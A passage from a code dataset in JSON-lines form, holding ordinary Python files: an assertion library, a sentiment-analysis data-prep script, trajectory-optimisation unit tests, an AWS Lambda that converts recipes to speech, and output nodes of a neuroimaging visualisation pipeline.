ContainsMixin\nfrom .numeric import NumericMixin\nfrom .string import StringMixin\nfrom .collection import CollectionMixin\nfrom .dict import DictMixin\nfrom .date import DateMixin\nfrom .file import FileMixin\nfrom .extracting import ExtractingMixin\nfrom .snapshot import SnapshotMixin\nfrom .exception import ExceptionMixin\nfrom .dynamic import DynamicMixin\nfrom .helpers import HelpersMixin\n\n__version__ = '0.15'\n\n__tracebackhide__ = True # clean tracebacks via py.test integration\ncontextlib.__tracebackhide__ = True # monkey patch contextlib with clean py.test tracebacks\n\n\n# soft assertions\n_soft_ctx = 0\n_soft_err = []\n\n@contextlib.contextmanager\ndef soft_assertions():\n global _soft_ctx\n global _soft_err\n\n # init ctx\n if _soft_ctx == 0:\n _soft_err = []\n _soft_ctx += 1\n\n try:\n yield\n finally:\n # reset ctx\n _soft_ctx -= 1\n\n if _soft_err and _soft_ctx == 0:\n out = 'soft assertion failures:'\n for i,msg in enumerate(_soft_err):\n out += '\\n%d. %s' % (i+1, msg)\n # reset msg, then raise\n _soft_err = []\n raise AssertionError(out)\n\n# factory methods\ndef assert_that(val, description=''):\n \"\"\"Factory method for the assertion builder with value to be tested and optional description.\"\"\"\n global _soft_ctx\n if _soft_ctx:\n return builder(val, description, 'soft')\n return builder(val, description)\n\ndef assert_warn(val, description='', logger=None):\n \"\"\"Factory method for the assertion builder with value to be tested, optional description, and\n just warn on assertion failures instead of raisings exceptions.\"\"\"\n return builder(val, description, 'warn', logger=logger)\n\ndef fail(msg=''):\n \"\"\"Force test failure with the given message.\"\"\"\n raise AssertionError('Fail: %s!' % msg if msg else 'Fail!')\n\ndef soft_fail(msg=''):\n \"\"\"Adds error message to soft errors list if within soft assertions context.\n Either just force test failure with the given message.\"\"\"\n global _soft_ctx\n if _soft_ctx:\n global _soft_err\n _soft_err.append('Fail: %s!' 
% msg if msg else 'Fail!')\n return\n fail(msg)\n\n# assertion extensions\n_extensions = {}\ndef add_extension(func):\n if not callable(func):\n raise TypeError('func must be callable')\n _extensions[func.__name__] = func\n\ndef remove_extension(func):\n if not callable(func):\n raise TypeError('func must be callable')\n if func.__name__ in _extensions:\n del _extensions[func.__name__]\n\ndef builder(val, description='', kind=None, expected=None, logger=None):\n ab = AssertionBuilder(val, description, kind, expected, logger)\n if _extensions:\n # glue extension method onto new builder instance\n for name,func in _extensions.items():\n meth = types.MethodType(func, ab)\n setattr(ab, name, meth)\n return ab\n\n# warnings\nclass WarningLoggingAdapter(logging.LoggerAdapter):\n \"\"\"Logging adapter to unwind the stack to get the correct callee filename and line number.\"\"\"\n def process(self, msg, kwargs):\n def _unwind(frame, fn='assert_warn'):\n if frame and fn in frame.f_code.co_names:\n return frame\n return _unwind(frame.f_back, fn)\n\n frame = _unwind(inspect.currentframe())\n lineno = frame.f_lineno\n filename = os.path.basename(frame.f_code.co_filename)\n return '[%s:%d]: %s' % (filename, lineno, msg), kwargs\n\n_logger = logging.getLogger('assertpy')\n_handler = logging.StreamHandler(sys.stdout)\n_handler.setLevel(logging.WARNING)\n_format = logging.Formatter('%(asctime)s %(levelname)s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n_handler.setFormatter(_format)\n_logger.addHandler(_handler)\n_default_logger = WarningLoggingAdapter(_logger, None)\n\n\nclass AssertionBuilder(DynamicMixin, ExceptionMixin, SnapshotMixin, ExtractingMixin,\n FileMixin, DateMixin, DictMixin, CollectionMixin, StringMixin, NumericMixin,\n ContainsMixin, HelpersMixin, BaseMixin, object):\n \"\"\"Assertion builder.\"\"\"\n\n def __init__(self, val, description='', kind=None, expected=None, logger=None):\n \"\"\"Construct the assertion builder.\"\"\"\n self.val = val\n self.description = description\n self.kind = kind\n self.expected = expected\n self.logger = logger if logger else _default_logger\n\n def _builder(self, val, description='', kind=None, expected=None, logger=None):\n \"\"\"Helper to build a new Builder. 
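Any extensions registered via add_extension get re-attached to the new instance. 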
Only used when we don't want to chain.\"\"\"\n        return builder(val, description, kind, expected, logger)\n\n    def _err(self, msg):\n        \"\"\"Helper to raise an AssertionError, and optionally prepend custom description.\"\"\"\n        out = '%s%s' % ('[%s] ' % self.description if len(self.description) > 0 else '', msg)\n        if self.kind == 'warn':\n            self.logger.warning(out)\n            return self\n        elif self.kind == 'soft':\n            global _soft_err\n            _soft_err.append(out)\n            return self\n        else:\n            raise AssertionError(out)\n","sub_path":"assertpy/assertpy.py","file_name":"assertpy.py","file_ext":"py","file_size_in_byte":6864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"122507642","text":"import pickle\nimport numpy as np\nimport pandas as pd\nfrom keras import Input\nfrom keras.layers import Embedding\n\nfrom absa_config import Config\n\n\ndef list_flatten(l):\n    result = list()\n    for item in l:\n        if isinstance(item, (list, tuple)):\n            result.extend(item)\n        else:\n            result.append(item)\n    return result\n\n\ndef build_vocabulary(corpus, start_id=1):\n    corpus = list_flatten(corpus)\n    return dict((word, idx) for idx, word in enumerate(set(corpus), start=start_id))\n\ntrain_file = pd.read_csv(\"/Users/duty/downloads/zhijiang_race/TRAIN/Train_reviews.csv\")\nlabel_file = pd.read_csv(\"/Users/duty/downloads/zhijiang_race/TRAIN/Train_labels.csv\")\nnew_data = pd.merge(train_file, label_file, on='id')\nfilter_data = pd.DataFrame(new_data, columns=['id', 'Reviews', 'Categories', 'Polarities'])\ndrop_duplicate_data = filter_data.drop_duplicates()\npd.DataFrame.to_csv(drop_duplicate_data.loc[0:4000], \"absa_train_data.csv\", header=True, index=False)\npd.DataFrame.to_csv(drop_duplicate_data.loc[4000:5000], \"absa_valid_data.csv\", header=True, index=False)\npd.DataFrame.to_csv(drop_duplicate_data.loc[5000:], \"absa_test_data.csv\", header=True, index=False)\n\n## split the raw data into train and test sets, map content characters to ids and aspect phrases to ids\n## training set\ntrain_data = pd.read_csv('absa_train_data.csv', header=0, index_col=None)\ntrain_data['content_char_list'] = train_data['Reviews'].apply(lambda x: list(x))## pull out every char\ntrain_data['aspect_char_list'] = train_data['Categories'].apply(lambda x: list(x))\ntrain_data['aspect_term_list'] = train_data['Categories'].values\n## validation set\nvalid_data = pd.read_csv('absa_valid_data.csv', header=0, index_col=None)\nvalid_data['content_char_list'] = valid_data['Reviews'].apply(lambda x: list(x))## pull out every char\nvalid_data['aspect_char_list'] = valid_data['Categories'].apply(lambda x: list(x))\nvalid_data['aspect_term_list'] = valid_data['Categories'].values\n## test set\ntest_data = pd.read_csv('absa_test_data.csv', header=0, index_col=None)\ntest_data['content_char_list'] = test_data['Reviews'].apply(lambda x: list(x))## pull out every char\ntest_data['aspect_char_list'] = test_data['Categories'].apply(lambda x: list(x))\ntest_data['aspect_term_list'] = test_data['Categories'].values\n### build the char-to-id mapping as a dict\ntotal_chars = np.concatenate((train_data['content_char_list'].values, valid_data['content_char_list'].values, test_data['content_char_list'].values)).tolist()\ncontent_char_corpus = build_vocabulary(total_chars, start_id=1)\ntotal_aspect_chars = np.concatenate((train_data['aspect_char_list'].values, valid_data['aspect_char_list'].values, test_data['aspect_char_list'].values)).tolist()\naspect_char_corpus = build_vocabulary(total_aspect_chars, start_id=1)\ntotal_aspect_terms = np.concatenate((train_data['aspect_term_list'].values, valid_data['aspect_term_list'].values, test_data['aspect_term_list'].values)).tolist()\naspect_term_corpus = build_vocabulary(total_aspect_terms, start_id=0)\npickle.dump(content_char_corpus, open(\"./absa_data/content_char_corpus.pkl\", \"wb\"))\npickle.dump(aspect_char_corpus, open(\"./absa_data/aspect_char_corpus.pkl\", \"wb\"))\npickle.dump(aspect_term_corpus, open(\"./absa_data/aspect_term_corpus.pkl\", \"wb\"))\n\n### based on\n\n\n\nprint(\"dd\")\n","sub_path":"absa_data_process.py","file_name":"absa_data_process.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"319165339","text":"import os\nimport unittest\nimport numpy as np\nfrom numpy.testing import assert_almost_equal\n\nimport dymos.examples.brachistochrone.test.ex_brachistochrone_vector_states as ex_brachistochrone_vs\nfrom openmdao.utils.testing_utils import use_tempdirs\n\nfrom openmdao.utils.general_utils import set_pyoptsparse_opt, printoptions\nfrom openmdao.utils.assert_utils import assert_check_partials\n\nOPT, OPTIMIZER = set_pyoptsparse_opt('SNOPT')\n\n\nclass TestBrachistochroneVectorStatesExample(unittest.TestCase):\n\n    def assert_results(self, p):\n        t_initial = p.get_val('phase0.time')[0]\n        t_final = p.get_val('phase0.time')[-1]\n\n        x0 = p.get_val('phase0.timeseries.states:pos')[0, 0]\n        xf = p.get_val('phase0.timeseries.states:pos')[-1, 0]\n\n        y0 = p.get_val('phase0.timeseries.states:pos')[0, 1]\n        yf = p.get_val('phase0.timeseries.states:pos')[-1, 1]\n\n        v0 = p.get_val('phase0.timeseries.states:v')[0, 0]\n        vf = p.get_val('phase0.timeseries.states:v')[-1, 0]\n\n        g = p.get_val('phase0.timeseries.design_parameters:g')\n\n        thetaf = p.get_val('phase0.timeseries.controls:theta')[-1, 0]\n\n        assert_almost_equal(t_initial, 0.0)\n        assert_almost_equal(x0, 0.0)\n        assert_almost_equal(y0, 10.0)\n        assert_almost_equal(v0, 0.0)\n\n        assert_almost_equal(t_final, 1.8016, decimal=4)\n        assert_almost_equal(xf, 10.0, decimal=3)\n        assert_almost_equal(yf, 5.0, decimal=3)\n        assert_almost_equal(vf, 9.902, decimal=3)\n        assert_almost_equal(g, 9.80665, decimal=3)\n\n        assert_almost_equal(thetaf, 100.12, decimal=0)\n\n    def assert_partials(self, p):\n        with printoptions(linewidth=1024, edgeitems=100):\n            cpd = p.check_partials(method='cs')\n        assert_check_partials(cpd)\n\n    @use_tempdirs\n    def test_ex_brachistochrone_vs_radau_compressed(self):\n        ex_brachistochrone_vs.SHOW_PLOTS = True\n        p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n                                                           compressed=True,\n                                                           force_alloc_complex=True,\n                                                           run_driver=True)\n        self.assert_results(p)\n        self.assert_partials(p)\n        self.tearDown()\n        if os.path.exists('ex_brachvs_radau_compressed.db'):\n            os.remove('ex_brachvs_radau_compressed.db')\n\n    @use_tempdirs\n    def test_ex_brachistochrone_vs_radau_uncompressed(self):\n        ex_brachistochrone_vs.SHOW_PLOTS = True\n        p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n                                                           compressed=False,\n                                                           force_alloc_complex=True,\n                                                           run_driver=True)\n        self.assert_results(p)\n        self.assert_partials(p)\n        self.tearDown()\n        if os.path.exists('ex_brachvs_radau_uncompressed.db'):\n            os.remove('ex_brachvs_radau_uncompressed.db')\n\n    @use_tempdirs\n    def test_ex_brachistochrone_vs_gl_compressed(self):\n        ex_brachistochrone_vs.SHOW_PLOTS = True\n        p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n                                                           compressed=True,\n                                                           force_alloc_complex=True,\n                                                           run_driver=True)\n\n        self.assert_results(p)\n        self.assert_partials(p)\n        self.tearDown()\n        if 
os.path.exists('ex_brachvs_gl_compressed.db'):\n            os.remove('ex_brachvs_gl_compressed.db')\n\n    @use_tempdirs\n    def test_ex_brachistochrone_vs_gl_uncompressed(self):\n        ex_brachistochrone_vs.SHOW_PLOTS = True\n        p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n                                                           transcription_order=5,\n                                                           compressed=False,\n                                                           force_alloc_complex=True,\n                                                           run_driver=True)\n        self.assert_results(p)\n        self.assert_partials(p)\n        self.tearDown()\n        if os.path.exists('ex_brachvs_gl_compressed.db'):\n            os.remove('ex_brachvs_gl_compressed.db')\n\n    @use_tempdirs\n    def test_ex_brachistochrone_vs_rungekutta_compressed(self):\n        import openmdao.api as om\n        import dymos as dm\n        from dymos.examples.brachistochrone.brachistochrone_vector_states_ode import \\\n            BrachistochroneVectorStatesODE\n\n        p = om.Problem(model=om.Group())\n\n        p.driver = om.ScipyOptimizeDriver()\n\n        p.driver.declare_coloring()\n\n        phase = dm.Phase(ode_class=BrachistochroneVectorStatesODE,\n                         transcription=dm.RungeKutta(num_segments=20, compressed=True))\n\n        p.model.add_subsystem('phase0', phase)\n\n        phase.set_time_options(fix_initial=True, duration_bounds=(.5, 10))\n\n        phase.add_state('pos',\n                        shape=(2,),\n                        rate_source=BrachistochroneVectorStatesODE.states['pos']['rate_source'],\n                        units=BrachistochroneVectorStatesODE.states['pos']['units'],\n                        fix_initial=True, fix_final=False)\n        phase.add_state('v',\n                        rate_source=BrachistochroneVectorStatesODE.states['v']['rate_source'],\n                        targets=BrachistochroneVectorStatesODE.states['v']['targets'],\n                        units=BrachistochroneVectorStatesODE.states['v']['units'],\n                        fix_initial=True, fix_final=False)\n\n        phase.add_control('theta', units='deg',\n                          targets=BrachistochroneVectorStatesODE.parameters['theta']['targets'],\n                          rate_continuity=False, lower=0.01, upper=179.9)\n\n        phase.add_design_parameter('g',\n                                   targets=BrachistochroneVectorStatesODE.parameters['g']['targets'],\n                                   units='m/s**2', opt=False, val=9.80665)\n\n        phase.add_boundary_constraint('pos', loc='final', lower=[10, 5])\n\n        # Minimize time at the end of the phase\n        phase.add_objective('time', loc='final', scaler=10)\n\n        p.model.linear_solver = om.DirectSolver()\n        p.setup(check=True, force_alloc_complex=True)\n\n        p['phase0.t_initial'] = 0.0\n        p['phase0.t_duration'] = 1.80162174\n\n        pos0 = [0, 10]\n        posf = [10, 5]\n\n        p['phase0.states:pos'] = phase.interpolate(ys=[pos0, posf], nodes='state_input')\n        p['phase0.states:v'] = phase.interpolate(ys=[0, 9.9], nodes='state_input')\n        p['phase0.controls:theta'] = phase.interpolate(ys=[0.46, 100.22900215],\n                                                       nodes='control_input')\n        p['phase0.design_parameters:g'] = 9.80665\n\n        p.run_driver()\n\n        self.assert_results(p)\n        self.tearDown()\n\n\nclass TestBrachistochroneVectorStatesExampleSolveSegments(unittest.TestCase):\n\n    @classmethod\n    def tearDownClass(cls):\n        for filename in ['phase0_sim.db', 'brachistochrone_sim.db']:\n            if os.path.exists(filename):\n                os.remove(filename)\n\n    def assert_results(self, p):\n        t_initial = p.get_val('phase0.time')[0]\n        t_final = p.get_val('phase0.time')[-1]\n\n        x0 = p.get_val('phase0.timeseries.states:pos')[0, 0]\n        xf = p.get_val('phase0.timeseries.states:pos')[-1, 0]\n\n        y0 = p.get_val('phase0.timeseries.states:pos')[0, 1]\n        yf = p.get_val('phase0.timeseries.states:pos')[-1, 1]\n\n        v0 = p.get_val('phase0.timeseries.states:v')[0, 0]\n        vf = p.get_val('phase0.timeseries.states:v')[-1, 0]\n\n        g = p.get_val('phase0.timeseries.design_parameters:g')\n\n        thetaf = p.get_val('phase0.timeseries.controls:theta')[-1, 0]\n\n        assert_almost_equal(t_initial, 0.0)\n        assert_almost_equal(x0, 
0.0)\n assert_almost_equal(y0, 10.0)\n assert_almost_equal(v0, 0.0)\n\n assert_almost_equal(t_final, 1.8016, decimal=4)\n assert_almost_equal(xf, 10.0, decimal=3)\n assert_almost_equal(yf, 5.0, decimal=3)\n assert_almost_equal(vf, 9.902, decimal=3)\n assert_almost_equal(g, 9.80665, decimal=3)\n\n assert_almost_equal(thetaf, 100.12, decimal=0)\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_radau_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = False\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='radau-ps',\n compressed=True,\n force_alloc_complex=True,\n solve_segments=True)\n\n p.final_setup()\n # set the final optimized control profile from\n # TestBrachistochroneVectorStatesExample.test_ex_brachistochrone_vs_radau_compressed\n # and see if we get the right state history\n theta = np.array([2.54206362, 4.8278643, 10.11278149, 12.30024503, 17.35332815,\n 23.53948016, 25.30747573, 29.39010464, 35.47854735, 37.51549822,\n 42.16351471, 48.32419264, 50.21299389, 54.56658635, 60.77733663,\n 62.79222351, 67.35945157, 73.419141, 75.27851226, 79.60246558,\n 85.89170743, 87.96027845, 92.66164608, 98.89108826, ])\n\n p['phase0.controls:theta'] = theta.reshape((-1, 1))\n p['phase0.states:v'][:] = 100. # bad initial guess on purpose\n p['phase0.states:v'][0] = 0. # have to set the initial condition\n\n p['phase0.states:pos'][:] = 100.\n p['phase0.states:pos'][0, 0] = 0. # have to set the initial condition\n p['phase0.states:pos'][0, 1] = 10. # have to set the initial condition\n\n p['phase0.t_duration'] = 1.8016 # need the final duration (ivp style)\n\n p.run_model()\n self.assert_results(p)\n # self.assert_partials(p)\n self.tearDown()\n if os.path.exists('ex_brachvs_radau_compressed.db'):\n os.remove('ex_brachvs_radau_compressed.db')\n\n @use_tempdirs\n def test_ex_brachistochrone_vs_gl_compressed(self):\n ex_brachistochrone_vs.SHOW_PLOTS = False\n p = ex_brachistochrone_vs.brachistochrone_min_time(transcription='gauss-lobatto',\n compressed=True,\n force_alloc_complex=True,\n solve_segments=True)\n\n theta = np.array([1.04466973, 6.40253991, 12.26063396, 18.51810659, 25.07411252,\n 31.59842762, 37.76082779, 43.8810928, 50.27900244, 56.67270776,\n 62.78035981, 68.93138259, 75.45520008, 81.95935786, 88.05140149,\n 94.03879494, 100.22900215])\n\n p['phase0.controls:theta'] = theta.reshape((-1, 1))\n p['phase0.states:v'][:] = 100 # bad initial guess on purpose\n p['phase0.states:v'][0] = 0 # have to set the initial condition\n\n p['phase0.states:pos'][:] = 100\n p['phase0.states:pos'][0, 0] = 0 # have to set the initial condition\n p['phase0.states:pos'][0, 1] = 10. 
# have to set the initial condition\n\n        p['phase0.t_duration'] = 1.8016  # need the final duration (ivp style)\n\n        p.run_model()\n        self.assert_results(p)\n\n        self.tearDown()\n        if os.path.exists('ex_brachvs_gl_compressed.db'):\n            os.remove('ex_brachvs_gl_compressed.db')\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"dymos/examples/brachistochrone/test/test_ex_brachistochrone_vector_states.py","file_name":"test_ex_brachistochrone_vector_states.py","file_ext":"py","file_size_in_byte":11831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"398886198","text":"from __future__ import print_function\nfrom pprint import pprint\nfrom contextlib import closing\nimport json \nimport boto3\n\ndef lambda_handler(event, context):\n    \n    client = boto3.client('s3') \n    s3 = boto3.resource('s3', aws_access_key_id='__AWS_ID__',aws_secret_access_key='__AWS_KEY__')\n    \n    bucket = event['Records'][0]['s3']['bucket']['name']\n    key = event['Records'][0]['s3']['object']['key']\n    obj = client.get_object(Bucket=bucket, Key=key)\n    \n    #get json data from s3 object\n    jdata=obj['Body'].read()\n    \n    #parse json\n    parsed_json1 = json.loads(jdata) \n    recipeTitle= parsed_json1['recipeTitle']\n    recipeSleep=parsed_json1['recipeIns'][0]['sleep']\n    recipeIns=parsed_json1['recipeIns']\n    finalrecipe=''\n    \n    newKey = key.replace( '.json', '.mp3' )\n    txtKey = key.replace( '.json', '.txt' )\n    \n    #loop over parsed data and create ssml for polly with breaks\n    for ins in recipeIns:\n        outSleep=ins['sleep']\n        outIns=ins['instruction']\n        pprint('{}<break time=\"{}s\"/>'.format(outIns, outSleep))\n        finalrecipe= finalrecipe + '{}<break time=\"{}s\"/> '.format(outIns, outSleep)\n    \n    s3.Bucket('cmpe281-recipe').put_object(Key=txtKey, Body=finalrecipe)\n    \n    pprint(finalrecipe)\n    pprint('****** Get ready for POLLY ******')\n    \n    pollyclient = boto3.client('polly',aws_access_key_id='__AWS_ID__', aws_secret_access_key='__AWS_KEY__')\n    mp3key=recipeTitle+'.mp3'\n    \n    #calling polly function to create mp3 for our recipes!!\n    response = pollyclient.synthesize_speech(\n        Text = '<speak>'+'Here we go with'+ recipeTitle + finalrecipe +'</speak>',\n        TextType ='ssml',\n        VoiceId='Joanna',\n        OutputFormat='mp3')\n    \n    #putting polly mp3 file - streaming object to s3 bucket\n    with closing(response[\"AudioStream\"]) as stream:\n        s3.Bucket('cmpe281-mp3').put_object(Key=newKey, Body=stream.read())\n    \n    return 'HiFi from Food Admin'\n","sub_path":"src/lambda/Converter.py","file_name":"Converter.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"138801425","text":"\"\"\"\nDefinition of pipeline output nodes\n\nExposed classes\n---------------\nLSLStreamOutput: OutputNode\n    Output signal to LSL stream\nBrainViewer: _WidgetOutput\n    Plot heatmap on a 3d brain\nSignalViewer: _WidgetOutput\n    Plot signals\nFileOutput: OutputNode\n    Output signal to file\nTorchOutput: OutputNode\n    Wrap signal in Torch tensors\nConnectivityViewer: _WidgetOutput\n    Plot connectivity\n\n\n\"\"\"\nimport os\nimport time\nfrom types import SimpleNamespace\n\nimport tables\nfrom PyQt5.QtWidgets import QApplication\n\nimport mne\nimport numpy as np\nfrom scipy import sparse\n\nfrom ..utils.pysurfer.smoothing_matrix import smoothing_matrix, mesh_edges\nfrom .node import OutputNode\nfrom .. 
import CHANNEL_AXIS, TIME_AXIS, PYNFB_TIME_AXIS\nfrom ..utils.lsl import (\n convert_numpy_format_to_lsl,\n convert_numpy_array_to_lsl_chunk,\n create_lsl_outlet,\n)\nfrom ..utils.matrix_functions import last_sample, make_time_dimension_second\nfrom ..utils.ring_buffer import RingBuffer\nfrom ..utils.channels import read_channel_types, channel_labels_saver\nfrom ..utils.inverse_model import get_mesh_data_from_forward_solution\nfrom ..utils.brain_visualization import get_mesh_data_from_surfaces_dir\nfrom vendor.nfb.pynfb.widgets.signal_viewers import RawSignalViewer\n\nfrom ..gui.connect_obj import ConnectObj\nfrom ..gui.source_obj import SourceObj\nfrom vispy import scene\n\n\n# -------- gif recorder -------- #\nfrom PIL import Image as im\n\n# ------------------------------ #\n\n__all__ = (\n \"LSLStreamOutput\",\n \"BrainViewer\",\n \"SignalViewer\",\n \"FileOutput\",\n \"TorchOutput\",\n \"ConnectivityViewer\",\n)\n\n\nclass _WidgetOutput(OutputNode):\n \"\"\"Abstract class for widget initialization logic with qt signals\"\"\"\n\n def __init__(self, *pargs, **kwargs):\n OutputNode.__init__(self, *pargs, **kwargs)\n self._signal_sender.init_widget_sig.connect(self._init_widget)\n self._signal_sender.draw_sig.connect(self.on_draw)\n\n def _init_widget(self):\n if self.widget and self.widget.parent():\n parent = self.widget.parent()\n old_widget = self.widget\n else:\n parent = None\n self.widget = self._create_widget()\n if parent:\n parent.setWidget(self.widget)\n old_widget.deleteLater()\n else:\n self.root._signal_sender.node_widget_added.emit(\n self.widget, repr(self)\n )\n self.widget.pipeline_node = self\n\n def _create_widget(self):\n raise NotImplementedError\n\n def on_draw(self):\n raise NotImplementedError\n\n\nclass LSLStreamOutput(OutputNode):\n def _on_input_history_invalidation(self):\n pass\n\n def _check_value(self, key, value):\n pass # TODO: check that value as a string usable as a stream name\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\"stream_name\",)\n\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\n \"source_name\",\n \"mne_info\",\n \"dtype\",\n )\n\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\n \"mne_info\": lambda info: (info[\"sfreq\"],) + channel_labels_saver(info)\n }\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n # It is impossible to change then name of an already\n # started stream so we have to initialize again\n self.initialize()\n\n def __init__(self, stream_name=None):\n super().__init__()\n self._provided_stream_name = stream_name\n self.stream_name = None\n self._outlet = None\n\n def _initialize(self):\n # If no name was supplied use a modified\n # version of the source name (a file or a stream name)\n source_name = self.traverse_back_and_find(\"source_name\")\n if not self.stream_name:\n self.stream_name = source_name + \"_output\"\n\n # Get other info from somewhere down the predecessor chain\n dtype = self.traverse_back_and_find(\"dtype\")\n channel_format = convert_numpy_format_to_lsl(dtype)\n mne_info = self.traverse_back_and_find(\"mne_info\")\n frequency = mne_info[\"sfreq\"]\n channel_labels = mne_info[\"ch_names\"]\n channel_types = read_channel_types(mne_info)\n\n self._outlet = create_lsl_outlet(\n name=self.stream_name,\n frequency=frequency,\n channel_format=channel_format,\n channel_labels=channel_labels,\n channel_types=channel_types,\n )\n\n def _update(self):\n chunk = self.parent.output\n lsl_chunk = convert_numpy_array_to_lsl_chunk(chunk)\n self._outlet.push_chunk(lsl_chunk)\n\n\nclass 
BrainViewer(_WidgetOutput):\n\n CHANGES_IN_THESE_REQUIRE_RESET = (\n \"buffer_length\",\n \"take_abs\",\n \"limits_mode\",\n \"threshold_pct\",\n )\n UPSTREAM_CHANGES_IN_THESE_REQUIRE_REINITIALIZATION = (\n \"fwd_path\",\n \"mne_info\",\n )\n\n SAVERS_FOR_UPSTREAM_MUTABLE_OBJECTS = {\"mne_info\": channel_labels_saver}\n\n LIMITS_MODES = SimpleNamespace(\n GLOBAL=\"Global\", LOCAL=\"Local\", MANUAL=\"Manual\"\n )\n\n def __init__(\n self,\n take_abs=True,\n limits_mode=LIMITS_MODES.LOCAL,\n buffer_length=1,\n threshold_pct=50,\n ):\n super().__init__()\n\n self.limits_mode = limits_mode\n self.lock_limits = False\n self.buffer_length = buffer_length\n self.take_abs = take_abs\n self.colormap_limits = SimpleNamespace(lower=None, upper=None)\n self.threshold_pct = threshold_pct\n\n self._limits_buffer = None\n self.surfaces_dir = None\n self._mesh = None\n self._smoothing_matrix = None\n self.widget = None\n self.output = None\n\n # -------- gif recorder -------- #\n self.is_recording = False\n self.sector = None\n\n self._start_time = None\n self._display_time = None # Time in ms between switching images\n\n self._images = []\n self._signal_sender.screenshot_sig.connect(self._append_screenshot)\n # ------------------------------ #\n\n def _initialize(self):\n fwd_path = self.traverse_back_and_find(\"fwd_path\")\n subject = self.traverse_back_and_find(\"subject\")\n subjects_dir = self.traverse_back_and_find(\"subjects_dir\")\n self.surfaces_dir = os.path.join(subjects_dir, subject)\n\n frequency = self.traverse_back_and_find(\"mne_info\")[\"sfreq\"]\n buffer_sample_count = np.int(self.buffer_length * frequency)\n self._limits_buffer = RingBuffer(row_cnt=2, maxlen=buffer_sample_count)\n\n self.forward_solution = mne.read_forward_solution(\n fwd_path, verbose=\"ERROR\"\n )\n self._mesh = get_mesh_data_from_surfaces_dir(self.surfaces_dir)\n self._signal_sender.init_widget_sig.emit()\n self._smoothing_matrix = self._get_smoothing_matrix(fwd_path)\n\n def _on_input_history_invalidation(self):\n # TODO: change min-max buffer values\n pass\n\n def _check_value(self, key, value):\n pass\n\n def _on_critical_attr_change(self, key, old_val, new_val) -> bool:\n self._limits_buffer.clear()\n\n def _update(self):\n sources = self.parent.output\n self.output = sources\n if self.take_abs:\n sources = np.abs(sources)\n self._update_colormap_limits(sources)\n normalized_sources = self._normalize_sources(last_sample(sources))\n self._signal_sender.draw_sig.emit(normalized_sources)\n\n if self.is_recording:\n self._signal_sender.screenshot_sig.emit()\n\n def _update_colormap_limits(self, sources):\n self._limits_buffer.extend(\n np.array(\n [\n make_time_dimension_second(\n np.min(sources, axis=CHANNEL_AXIS)\n ),\n make_time_dimension_second(\n np.max(sources, axis=CHANNEL_AXIS)\n ),\n ]\n )\n )\n\n if self.limits_mode == self.LIMITS_MODES.GLOBAL:\n mins, maxs = self._limits_buffer.data\n self.colormap_limits.lower = np.percentile(mins, q=5)\n self.colormap_limits.upper = np.percentile(maxs, q=95)\n elif self.limits_mode == self.LIMITS_MODES.LOCAL:\n sources = last_sample(sources)\n self.colormap_limits.lower = np.min(sources)\n self.colormap_limits.upper = np.max(sources)\n elif self.limits_mode == self.LIMITS_MODES.MANUAL:\n pass\n\n def _normalize_sources(self, last_sources):\n minimum = self.colormap_limits.lower\n maximum = self.colormap_limits.upper\n if minimum == maximum:\n return last_sources * 0\n else:\n return (last_sources - minimum) / (maximum - minimum)\n\n def on_draw(self, 
normalized_values):\n QApplication.processEvents()\n if self._smoothing_matrix is not None:\n sources_smoothed = self._smoothing_matrix.dot(normalized_values)\n else:\n self._logger.debug(\"Draw without smoothing\")\n sources_smoothed = normalized_values\n threshold = self.threshold_pct / 100\n mask = sources_smoothed <= threshold\n\n # reset colors to white\n self._mesh._alphas[:, :] = 0.0\n self._mesh._alphas_buffer.set_data(self._mesh._alphas)\n\n if np.any(~mask):\n self._mesh.add_overlay(\n sources_smoothed[~mask],\n vertices=np.where(~mask)[0],\n to_overlay=1,\n )\n\n self._mesh.update()\n # if self._logger.getEffectiveLevel() == 20: # INFO level\n self.canvas.measure_fps(\n window=10, callback=self._signal_sender.fps_updated.emit\n )\n\n def _create_widget(self):\n canvas = scene.SceneCanvas(keys=\"interactive\", show=False)\n self.canvas = canvas\n\n # Add a ViewBox to let the user zoom/rotate\n view = canvas.central_widget.add_view()\n view.camera = \"turntable\"\n view.camera.fov = 50\n view.camera.distance = 400\n # Make light follow the camera\n self._mesh.shared_program.frag[\"camtf\"] = view.camera.transform\n view.add(self._mesh)\n return canvas.native\n\n def _get_smoothing_matrix(self, fwd_path):\n \"\"\"\n Creates or loads a smoothing matrix that lets us\n interpolate source values onto all mesh vertices\n\n \"\"\"\n # Not all the vertices in the forward solution mesh are sources.\n # sources_idx actually indexes into the union of\n # high-definition meshes for left and right hemispheres.\n # The smoothing matrix then lets us assign a color to each vertex.\n # If in future we decide to use low-definition mesh from\n # the forward model for drawing, we should index into that.\n # Shorter: the coordinates of the jth source are\n # in self._mesh.vertexes()[sources_idx[j], :]\n smoothing_matrix_file_path = (\n os.path.splitext(fwd_path)[0] + \"-smoothing-matrix.npz\"\n )\n try:\n return sparse.load_npz(smoothing_matrix_file_path)\n except FileNotFoundError:\n self._logger.info(\n \"Calculating smoothing matrix.\"\n + \" This might take a while the first time.\"\n )\n sources_idx, *_ = get_mesh_data_from_forward_solution(\n self.forward_solution\n )\n adj_mat = mesh_edges(self._mesh._faces)\n smoothing_mat = 